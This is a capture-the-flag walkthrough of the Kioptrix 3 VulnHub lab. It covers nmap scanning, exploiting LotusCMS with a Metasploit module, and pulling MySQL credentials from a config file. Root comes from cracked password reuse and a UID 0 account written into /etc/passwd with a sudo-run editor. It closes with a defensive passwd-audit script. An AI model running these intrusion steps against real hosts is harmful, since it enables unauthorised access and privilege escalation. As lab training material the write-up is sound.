CTF: Kioptrix 3
This is another OSCP-like VulnHub box that was very fun to do. I didn’t have any issues rooting this one and was able to do it rather quickly.
You will get practice with:
- mysql client
- file privilege escalation
I start off with an arp-scan to find the target on the local network… and it turns out that the box is 192.168.0.46. Let’s get this party started!
sudo arp-scan -l
A basic nmap scan returns a website and an ssh port. After the initial nmap scan I kick off a more thorough scan. It doesn’t tell me anything I didn’t learn from the initial scan.
# basic scan
nmap 192.168.0.46
# deeper scan (all ports, OS and version detection)
sudo nmap -p- -AO 192.168.0.46
The website looks like a simple CMS. On the login page, I can see that this is LotusCMS. I immediately search online and see there is a Metasploit module for it.
Exploit with Metasploit
I start up Metasploit and use the search functionality to find a module.
# start metasploit
msfconsole
# once started, search for "lotuscms"
search lotuscms
# use module
use exploit/multi/http/lcms_php_exec
# show options
show options
# set options
set RHOSTS 192.168.0.46
set URI /
# exploit
run
I personally prefer a shell over meterpreter. It’s just more natural. I also like having the ability to clear the screen, so I always set the TERM variable.
shell
python -c "import pty; pty.spawn('/bin/bash')"
export TERM=xterm
I immediately check the home directory to see who’s there. Then I check /etc/passwd and take notes.
ls -la /home/
ls -la /home/dreg /home/loneferret /home/www
ALRIGHT! There’s a pretty big clue. “.sudo_as_admin_successful” means that loneferret can run something as root. That looks like the way up!
I looked around and I didn’t see much of anything that I could exploit. I didn’t see any misconfigured file permissions that I had access to… but I did see that mysql was running and was bound locally.
I ran checksec.sh just to see what it did.
MySQL is Running
I found MySQL running locally and the MySQL client was able to connect to it. Looks like I need to find some credentials to access the database.
I tried logging in as root to see if a password had not been set… but I wasn’t that lucky.
Exploring the LotusCMS Website
It’s fair to assume that if there is a Content Management System (CMS) running then there should be credentials to access some sort of database. MySQL is the most common database used with PHP applications. After digging around I found a gallery folder that contained a file, “gconfig.php”. This file was referenced in index.php and looked like a global configuration file.
OK! I now have root credentials for the MySQL server.
Time to move through the database and see what I can find.
# connect to mysql from bash (no space between -p and the password)
mysql -u root -h 127.0.0.1 -pfuckeyou
# once in mysql
> show databases;
> use gallery;
> show tables;
> describe dev_accounts;
> select * from dev_accounts;
I took those two md5 hashes and dropped them in CrackStation to get the passwords.
Turns out their passwords are:
dreg – Mas3r
loneferret – starwars
It’s very common for people to re-use the same passwords for logins elsewhere. While these appear to be passwords for the gallery page, they could also be a Linux user’s password. Turns out, loneferret’s password works for shell access.
ssh loneferret@192.168.0.46
# password: starwars
I’m now in as the user loneferret, and I know this user has sudo access to an application.
So, I can run “ht”, which is a terminal editor, as root.
After messing around I was able to get a screen I could work on and I decided to use the same trick I used on HA: Albania and inject a user into the /etc/passwd file.
# append this to the /etc/passwd file in the ht editor
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash
Well, this just got easy… I really enjoyed this one.
su hax
# password: asdf
cd /root
ls -la
cat flag.txt
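From the defender’s side, the root step above leaves an obvious artifact: a second UID 0 account whose hash lives in /etc/passwd instead of /etc/shadow. The script below is an added example (not part of the original write-up) that audits a passwd file for exactly that; the sample passwd content, UIDs and home directories are constructed for the demo.

```shell
#!/bin/sh
# Constructed sample passwd file; the last line mirrors the injected entry.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:100:Dreg,,,:/home/dreg:/bin/rbash
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash'

# audit_passwd FILE
# Prints one finding per line and returns 1 if anything was flagged:
#  - an entry with UID 0 that is not "root"
#  - an entry with an empty password field (login without a password)
#  - an entry whose password field holds a hash rather than the
#    "x"/"*"/"!" placeholders, i.e. the hash bypasses /etc/shadow
#  - an entry that does not have the seven passwd fields
audit_passwd() {
    awk -F: '
        NF != 7 { print "malformed entry: " $0; found = 1; next }
        $3 == 0 && $1 != "root" { print "extra UID 0 account: " $1; found = 1 }
        $2 == "" { print "empty password field: " $1; found = 1 }
        $2 != "" && $2 != "x" && $2 != "*" && $2 != "!" {
            print "password hash stored in passwd, not shadow: " $1; found = 1
        }
        END { exit (found ? 1 : 0) }
    ' "$1"
}

# Run against the constructed sample; on a real host point it at /etc/passwd.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
audit_passwd "$tmp" || echo "audit flagged the entries above"
rm -f "$tmp"
```

Pair this with a periodic diff of /etc/passwd against a known-good copy and an alert on sudo invocations of interactive editors, and the technique used above becomes noisy rather than quiet.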